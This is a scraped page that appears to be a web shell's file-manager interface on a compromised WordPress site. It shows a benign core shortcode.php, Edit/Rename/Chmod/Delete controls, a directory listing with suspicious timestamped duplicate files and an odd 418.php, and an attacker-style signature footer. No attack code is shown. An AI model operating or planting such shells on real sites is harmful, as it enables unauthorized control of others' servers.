Submit
Path:
~
/
home
/
bfxleof
/
www
/
wp-includes
/
sodium_compat
/
File Content:
shortcode.php
<?php /** * Server-side rendering of the `core/shortcode` block. * * @package WordPress */ /** * Performs wpautop() on the shortcode block content. * * @param array $attributes The block attributes. * @param string $content The block content. * * @return string Returns the block content. */ function render_block_core_shortcode( $attributes, $content ) { return wpautop( $content ); } /** * Registers the `core/shortcode` block on server. */ function register_block_core_shortcode() { register_block_type_from_metadata( __DIR__ . '/shortcode', array( 'render_callback' => 'render_block_core_shortcode', ) ); } add_action( 'init', 'register_block_core_shortcode' );
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
lib
---
0755
namespaced
---
0755
src
---
0755
418.php
478 bytes
0644
LICENSE
860 bytes
0644
autoload.php
2731 bytes
0644
class-wp-http-streams.php
16117 bytes
0644
class-wp-oembed-controller.php
6793 bytes
0644
composer.json
1608 bytes
0644
https-detection-20260623043036.php
6871 bytes
0644
https-detection-20260623211809-20260705222630.php
6871 bytes
0644
https-detection-20260623211809.php
6871 bytes
0644
https-detection.php
6871 bytes
0644
https-migration-20260621222700-20260622020253.php
4730 bytes
0644
https-migration-20260621222700.php
4730 bytes
0644
https-migration-20260622015718.php
4730 bytes
0644
https-migration-20260622015815.php
4730 bytes
0644
https-migration-20260622021940.php
4730 bytes
0644
https-migration-20260622055634.php
4730 bytes
0644
https-migration-20260622123232-20260623074005.php
4730 bytes
0644
https-migration-20260622123232.php
4730 bytes
0644
https-migration.php
4730 bytes
0644
php72compat_const.php
4597 bytes
0644
post-thumbnail-template.php
9353 bytes
0644
shortcode.php
697 bytes
0644
N4ST4R_ID | Naxtarrr